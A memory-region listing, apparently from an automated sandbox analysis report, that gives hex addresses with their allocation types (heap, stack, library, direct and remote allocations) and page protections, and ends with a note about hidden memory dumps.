3C4000
|
heap
|
page read and write
|
||
|
7FE88F14000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89090000
|
trusted library allocation
|
page read and write
|
||
|
2283000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
237000
|
heap
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
3E2000
|
heap
|
page read and write
|
||
|
1C80000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
7FE88FC0000
|
trusted library allocation
|
page read and write
|
||
|
1C21D000
|
heap
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
2DE000
|
heap
|
page read and write
|
||
|
1F80000
|
trusted library allocation
|
page execute read
|
||
|
4215000
|
heap
|
page read and write
|
||
|
354F000
|
stack
|
page read and write
|
||
|
406A000
|
heap
|
page read and write
|
||
|
7FE89020000
|
trusted library allocation
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
256E000
|
trusted library allocation
|
page read and write
|
||
|
3BCE000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
493000
|
heap
|
page read and write
|
||
|
23AD000
|
stack
|
page read and write
|
||
|
23BE000
|
trusted library allocation
|
page read and write
|
||
|
3CB9000
|
heap
|
page read and write
|
||
|
7FE88EF2000
|
trusted library allocation
|
page read and write
|
||
|
3C91000
|
heap
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
1BEA0000
|
heap
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
4017000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
26F000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
4F7000
|
heap
|
page read and write
|
||
|
2544000
|
heap
|
page execute and read and write
|
||
|
3DEF000
|
stack
|
page read and write
|
||
|
26E000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
1B029000
|
heap
|
page read and write
|
||
|
7FE88FD0000
|
trusted library allocation
|
page read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
1D89000
|
heap
|
page read and write
|
||
|
1C820000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
2A01000
|
trusted library allocation
|
page read and write
|
||
|
395000
|
heap
|
page read and write
|
||
|
7FE88F58000
|
trusted library allocation
|
page read and write
|
||
|
451F000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
2289000
|
trusted library allocation
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
76E6000
|
trusted library allocation
|
page read and write
|
||
|
1E24000
|
heap
|
page read and write
|
||
|
25E000
|
heap
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
629000
|
heap
|
page read and write
|
||
|
2C6000
|
heap
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
30A000
|
heap
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
50C000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
4524000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
3CF000
|
heap
|
page read and write
|
||
|
44E6000
|
trusted library allocation
|
page read and write
|
||
|
1C1F7000
|
heap
|
page read and write
|
||
|
3B30000
|
heap
|
page read and write
|
||
|
7FE88FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE88FB0000
|
trusted library allocation
|
page read and write
|
||
|
2A17000
|
trusted library allocation
|
page read and write
|
||
|
7FE89050000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
23C1000
|
trusted library allocation
|
page read and write
|
||
|
42D6000
|
heap
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
2C98000
|
trusted library allocation
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
3CB9000
|
heap
|
page read and write
|
||
|
2255000
|
heap
|
page read and write
|
||
|
1A24D000
|
stack
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3739000
|
heap
|
page read and write
|
||
|
490000
|
direct allocation
|
page read and write
|
||
|
1C84E000
|
stack
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
1F60000
|
heap
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
141000
|
stack
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
1B00F000
|
stack
|
page read and write
|
||
|
3487000
|
direct allocation
|
page read and write
|
||
|
367F000
|
stack
|
page read and write
|
||
|
1AB2C000
|
stack
|
page read and write
|
||
|
401F000
|
stack
|
page read and write
|
||
|
44C2000
|
heap
|
page read and write
|
||
|
50C000
|
heap
|
page read and write
|
||
|
3743000
|
heap
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
23F000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
45E000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3C67000
|
heap
|
page read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
7FE88E00000
|
trusted library allocation
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
1C19E000
|
stack
|
page read and write
|
||
|
1E2E000
|
stack
|
page read and write | page guard
|
||
|
2A1000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page execute and read and write
|
||
|
24F9000
|
stack
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
44C2000
|
heap
|
page read and write
|
||
|
500000
|
direct allocation
|
page read and write
|
||
|
290C000
|
trusted library allocation
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
1ABD8000
|
stack
|
page read and write
|
||
|
2550000
|
remote allocation
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
160000
|
direct allocation
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
3BE0000
|
heap
|
page read and write
|
||
|
389E000
|
trusted library allocation
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
2289000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
3C3F000
|
heap
|
page read and write
|
||
|
3E77000
|
heap
|
page read and write
|
||
|
1EA0000
|
heap
|
page execute and read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
44CB000
|
heap
|
page read and write
|
||
|
4516000
|
heap
|
page read and write
|
||
|
7FE88FE0000
|
trusted library allocation
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
3C97000
|
heap
|
page read and write
|
||
|
228D000
|
trusted library allocation
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
7FE88D53000
|
trusted library allocation
|
page execute and read and write
|
||
|
3BD5000
|
heap
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
30F000
|
heap
|
page read and write
|
||
|
4526000
|
heap
|
page read and write
|
||
|
7FE88E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
3753000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
150000
|
heap
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
94E6000
|
trusted library allocation
|
page read and write
|
||
|
228F000
|
trusted library allocation
|
page read and write
|
||
|
48F000
|
direct allocation
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
3F64000
|
heap
|
page read and write
|
||
|
38C0000
|
trusted library allocation
|
page read and write
|
||
|
4377000
|
heap
|
page read and write
|
||
|
1AB000
|
stack
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
211F000
|
stack
|
page read and write
|
||
|
1E9B000
|
heap
|
page read and write
|
||
|
3420000
|
direct allocation
|
page read and write
|
||
|
1FE3000
|
direct allocation
|
page read and write
|
||
|
7FE88F38000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
343000
|
heap
|
page read and write
|
||
|
46FC000
|
heap
|
page read and write
|
||
|
4520000
|
heap
|
page read and write
|
||
|
7FE890B0000
|
trusted library allocation
|
page read and write
|
||
|
1B4FB000
|
heap
|
page read and write
|
||
|
4215000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
1CE4000
|
heap
|
page read and write
|
||
|
33A8000
|
heap
|
page read and write
|
||
|
1EB0000
|
heap
|
page read and write
|
||
|
164000
|
stack
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
310B000
|
stack
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
426A000
|
heap
|
page read and write
|
||
|
687000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
1C6BE000
|
stack
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
26E6000
|
trusted library allocation
|
page read and write
|
||
|
3466000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
46F6000
|
heap
|
page read and write
|
||
|
3739000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
3493000
|
direct allocation
|
page read and write
|
||
|
4491000
|
heap
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
1C437000
|
heap
|
page read and write
|
||
|
3F21000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4181000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
401C000
|
heap
|
page read and write
|
||
|
2852000
|
trusted library allocation
|
page read and write
|
||
|
1B45C000
|
stack
|
page read and write
|
||
|
7FE89010000
|
trusted library allocation
|
page read and write
|
||
|
1D70000
|
heap
|
page read and write
|
||
|
3C9C000
|
heap
|
page read and write
|
||
|
3C9C000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
7FE88EF0000
|
trusted library allocation
|
page read and write
|
||
|
1C1B7000
|
heap
|
page read and write
|
||
|
470000
|
direct allocation
|
page read and write
|
||
|
36BC000
|
stack
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
36A000
|
heap
|
page read and write
|
||
|
4D0000
|
direct allocation
|
page read and write
|
||
|
7FE88FA0000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
3BDD000
|
heap
|
page read and write
|
||
|
2283000
|
trusted library allocation
|
page read and write
|
||
|
343B000
|
stack
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
473000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5F0000
|
trusted library allocation
|
page execute read
|
||
|
7FE88F70000
|
trusted library allocation
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
38A000
|
heap
|
page read and write
|
||
|
48D000
|
heap
|
page read and write
|
||
|
3BDD000
|
heap
|
page read and write
|
||
|
22CF000
|
stack
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
43F000
|
heap
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
3747000
|
heap
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
3F62000
|
heap
|
page read and write
|
||
|
2820000
|
trusted library allocation
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
1AA20000
|
heap
|
page read and write
|
||
|
42AC000
|
heap
|
page read and write
|
||
|
433B000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
2286000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
trusted library allocation
|
page read and write
|
||
|
1C11B000
|
stack
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
1B190000
|
heap
|
page read and write
|
||
|
2470000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
2651000
|
trusted library allocation
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
1C22D000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
26E000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
4524000
|
heap
|
page read and write
|
||
|
1AA3F000
|
heap
|
page read and write
|
||
|
37F000
|
trusted library allocation
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
2260000
|
remote allocation
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
4207000
|
heap
|
page read and write
|
||
|
4690000
|
heap
|
page read and write
|
||
|
1C85000
|
heap
|
page read and write
|
||
|
1B66000
|
heap
|
page read and write
|
||
|
514000
|
heap
|
page read and write
|
||
|
7FE88EE7000
|
trusted library allocation
|
page read and write
|
||
|
3CAE000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
259000
|
heap
|
page read and write
|
||
|
189000
|
heap
|
page read and write
|
||
|
4524000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
1A1DD000
|
heap
|
page read and write
|
||
|
44B7000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
7FE88E16000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE890A0000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
256B000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
3F1E000
|
heap
|
page read and write
|
||
|
3CA2000
|
heap
|
page read and write
|
||
|
2CF3000
|
heap
|
page read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
1AA4B000
|
heap
|
page read and write
|
||
|
7FE88E0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
402000
|
heap
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
3BCF000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
12C000
|
stack
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
3E0000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F90000
|
trusted library allocation
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
3F20000
|
heap
|
page read and write
|
||
|
219000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1C3E6000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
3FF2000
|
heap
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
7FE88F34000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
12151000
|
trusted library allocation
|
page read and write
|
||
|
4239000
|
heap
|
page read and write
|
||
|
23BE000
|
trusted library allocation
|
page read and write
|
||
|
3C75000
|
heap
|
page read and write
|
||
|
4526000
|
heap
|
page read and write
|
||
|
1C64D000
|
stack
|
page read and write
|
||
|
2FE000
|
heap
|
page read and write
|
||
|
1F20000
|
heap
|
page read and write
|
||
|
23B5000
|
trusted library allocation
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
427000
|
heap
|
page read and write
|
||
|
330D000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3374000
|
heap
|
page read and write
|
||
|
3C67000
|
heap
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
30E6000
|
trusted library allocation
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
41C000
|
heap
|
page read and write
|
||
|
48B000
|
direct allocation
|
page read and write
|
||
|
492000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2BD000
|
heap
|
page read and write
|
||
|
3E1000
|
heap
|
page read and write
|
||
|
1C50000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
3F1E000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
5AB000
|
heap
|
page read and write
|
||
|
58E6000
|
trusted library allocation
|
page read and write
|
||
|
4DF000
|
heap
|
page read and write
|
||
|
1B0CE000
|
stack
|
page read and write
|
||
|
48D000
|
direct allocation
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
3BFA000
|
heap
|
page read and write
|
||
|
2572000
|
trusted library allocation
|
page read and write
|
||
|
42DF000
|
heap
|
page read and write
|
||
|
1B22F000
|
stack
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
23DF000
|
stack
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
7FE88F34000
|
trusted library allocation
|
page read and write
|
||
|
22B000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
1ED0000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
16F000
|
trusted library allocation
|
page read and write
|
||
|
23CA000
|
trusted library allocation
|
page read and write
|
||
|
A2000
|
stack
|
page read and write
|
||
|
25D0000
|
heap
|
page execute and read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
1A5A8000
|
heap
|
page execute and read and write
|
||
|
1AA44000
|
heap
|
page read and write
|
||
|
42EA000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
3BD6000
|
heap
|
page read and write
|
||
|
401C000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
382A000
|
stack
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
3397000
|
heap
|
page read and write
|
||
|
26A7000
|
trusted library allocation
|
page read and write
|
||
|
229000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1A5000
|
stack
|
page read and write
|
||
|
1B1C6000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
4180000
|
heap
|
page read and write
|
||
|
1A9E9000
|
stack
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
23BA000
|
trusted library allocation
|
page read and write
|
||
|
1A658000
|
stack
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
496000
|
heap
|
page read and write
|
||
|
60D000
|
heap
|
page read and write
|
||
|
3D7000
|
heap
|
page read and write
|
||
|
1FE0000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
25F000
|
heap
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
36F000
|
heap
|
page read and write
|
||
|
4063000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
3DAE000
|
stack
|
page read and write
|
||
|
374F000
|
heap
|
page read and write
|
||
|
21AF000
|
stack
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
2A7000
|
heap
|
page read and write
|
||
|
387000
|
heap
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
52B000
|
heap
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
3C9F000
|
heap
|
page read and write
|
||
|
1E2F000
|
stack
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
4268000
|
heap
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
23CB000
|
trusted library allocation
|
page read and write
|
||
|
23C0000
|
trusted library allocation
|
page read and write
|
||
|
4291000
|
heap
|
page read and write
|
||
|
23BE000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
direct allocation
|
page read and write
|
||
|
216000
|
heap
|
page read and write
|
||
|
361000
|
heap
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
5DE000
|
heap
|
page read and write
|
||
|
4377000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
23BF000
|
trusted library allocation
|
page read and write
|
||
|
34A000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2DC0000
|
trusted library allocation
|
page execute
|
||
|
228D000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
335A000
|
heap
|
page read and write
|
||
|
5266000
|
trusted library allocation
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
4215000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
3BD000
|
heap
|
page read and write
|
||
|
3C87000
|
heap
|
page read and write
|
||
|
4377000
|
heap
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
7FE89070000
|
trusted library allocation
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
3E77000
|
heap
|
page read and write
|
||
|
3389000
|
heap
|
page read and write
|
||
|
6666000
|
trusted library allocation
|
page read and write
|
||
|
3CAD000
|
heap
|
page read and write
|
||
|
1C86000
|
heap
|
page read and write
|
||
|
7FE88D60000
|
trusted library allocation
|
page read and write
|
||
|
335C000
|
heap
|
page read and write
|
||
|
39A000
|
heap
|
page read and write
|
||
|
3C08000
|
heap
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
1A80F000
|
stack
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
304000
|
heap
|
page read and write
|
||
|
2FCA000
|
stack
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
7FE88FF0000
|
trusted library allocation
|
page read and write
|
||
|
1A5A0000
|
heap
|
page execute and read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
4186000
|
heap
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
1C76000
|
heap
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
44B9000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
3C3F000
|
heap
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
1B250000
|
heap
|
page read and write
|
||
|
1C1DB000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
20C0000
|
heap
|
page execute and read and write
|
||
|
3CAE000
|
heap
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
2AC000
|
heap
|
page read and write
|
||
|
3ADD000
|
stack
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
3A4000
|
heap
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
2CF000
|
heap
|
page read and write
|
||
|
7FE88D52000
|
trusted library allocation
|
page read and write
|
||
|
3747000
|
heap
|
page read and write
|
||
|
3C67000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
4065000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
2C70000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page read and write
|
||
|
80E6000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
7FE88F07000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
37F000
|
heap
|
page read and write
|
||
|
4EE6000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
1CA2E000
|
stack
|
page read and write
|
||
|
42EB000
|
heap
|
page read and write
|
||
|
229000
|
heap
|
page read and write
|
||
|
205C000
|
stack
|
page read and write
|
||
|
1E20000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
3E70000
|
heap
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
3B6000
|
heap
|
page read and write
|
||
|
46FC000
|
heap
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
318000
|
heap
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
26A000
|
heap
|
page read and write
|
||
|
23B8000
|
trusted library allocation
|
page read and write
|
||
|
3BE0000
|
heap
|
page read and write
|
||
|
4239000
|
heap
|
page read and write
|
||
|
373F000
|
heap
|
page read and write
|
||
|
1A7B8000
|
stack
|
page read and write
|
||
|
7FE88ED0000
|
trusted library allocation
|
page read and write
|
||
|
23CA000
|
trusted library allocation
|
page read and write
|
||
|
3753000
|
heap
|
page read and write
|
||
|
258000
|
heap
|
page read and write
|
||
|
2BD000
|
heap
|
page read and write
|
||
|
1AF86000
|
heap
|
page read and write
|
||
|
331A000
|
heap
|
page read and write
|
||
|
23B8000
|
trusted library allocation
|
page read and write
|
There are 1517 hidden memdumps, click here to show them.